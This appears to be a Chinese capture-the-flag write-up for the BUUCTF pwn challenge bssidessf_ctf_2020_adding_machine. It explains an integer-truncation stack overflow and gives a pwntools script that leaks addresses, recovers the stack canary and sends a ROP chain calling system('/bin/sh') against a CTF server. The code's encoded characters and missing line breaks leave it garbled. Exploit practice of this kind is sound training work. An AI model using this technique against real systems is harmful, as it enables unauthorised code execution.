[BUUCTFpwn]bssidessf_ctf_2020_adding_machine

难度不大&＃xff0c;要求输入n个数&＃xff0c;但栈空间只能放127个数&＃xff0c;要求输入数<127但可以输入负数&＃xff0c;其它地址在输入debug时可以全部得到。

这里由于没有中途退出机制&＃xff0c;需要精确的输入一个负数表示执行次数

v6 &＃61; get_long("Number of numbers to add");if ( v6 <&＃61; 127 ){get_data(v8, (unsigned __int8)v6); // 输入负数里&＃xff0c;在这里用int8转成正数v7 &＃61; add_nums(v8, (unsigned __int8)v6);printf("Total is %ld\n", v7);result &＃61; 0;}

负数表示的次数为 n-256 这里需要输入133个&＃xff0c;输入数字为133-256&＃61;-123

然后输入padding,canary,rbp,pop_rdi&＃43;1,pop_rdi,bin_sh,system

from pwn import *elf &＃61; ELF(&＃39;./pwn&＃39;)
context.arch &＃61; &＃39;amd64&＃39;
context.log_level &＃61; &＃39;debug&＃39;def connect():global p,libc_elf,one,libc_start_main_ret,locallocal &＃61; 0if local &＃61;&＃61; 1:p &＃61; process(&＃39;./pwn&＃39;)libc_elf &＃61; ELF(&＃39;/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so&＃39;)one &＃61; [0x4240e, 0x42462, 0xc4f7f, 0xe31fa, 0xe31ee]libc_start_main_ret &＃61; 0x21a87else:p &＃61; remote(&＃39;node4.buuoj.cn&＃39;, 28595) libc_elf &＃61; ELF(&＃39;../libc6_2.27-3ubuntu1_amd64.so&＃39;)one &＃61; [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]libc_start_main_ret &＃61; 0x21b97def pwn():p.sendlineafter(b&＃39;Number of numbers to add> &＃39;, &＃39;-123&＃39;)p.sendlineafter(b&＃39;> &＃39;, b&＃39;debug&＃39;)p.recvuntil(b&＃39;&＃64; &＃39;)pwn_base &＃61; int(p.recvline(), 16) - elf.sym[&＃39;main&＃39;]p.recvuntil(b&＃39;&＃64; &＃39;)libc_base &＃61; int(p.recvline(), 16) - libc_elf.sym[&＃39;printf&＃39;]p.recvuntil(b&＃39;RBP is &＃39;)rbp_addr &＃61; int(p.recvline(), 16)canary_addr &＃61; hex(rbp_addr -0x10).encode()while True:v &＃61; p.readline()if canary_addr in v:canary &＃61; u64(bytes.fromhex((v[42:65].replace(b&＃39; &＃39;,b&＃39;&＃39;)).decode() ))print(&＃39;canary:&＃39;, hex(canary))breakprint(hex(pwn_base), hex(libc_base), hex(canary))libc_elf.address &＃61; libc_basepop_rdi &＃61; next(libc_elf.search(asm(&＃39;pop rdi; ret&＃39;)))bin_sh &＃61; next(libc_elf.search(b&＃39;/bin/sh&＃39;))system &＃61; libc_elf.sym[&＃39;system&＃39;]for i in range(127):p.sendlineafter(b&＃39;> &＃39;, b&＃39;0&＃39;)p.sendlineafter(b&＃39;> &＃39;, str(canary).encode())p.sendlineafter(b&＃39;> &＃39;, b&＃39;0&＃39;)p.sendlineafter(b&＃39;> &＃39;, str(pop_rdi&＃43;1).encode())p.sendlineafter(b&＃39;> &＃39;, str(pop_rdi).encode())p.sendlineafter(b&＃39;> &＃39;, str(bin_sh).encode())p.sendlineafter(b&＃39;> &＃39;, str(system).encode())#p.sendlineafter(b&＃39;> &＃39;, b&＃39;0&＃39;)p.sendlineafter(b&＃39;\n&＃39;, b&＃39;cat /flag&＃39;)p.interactive()connect()
pwn()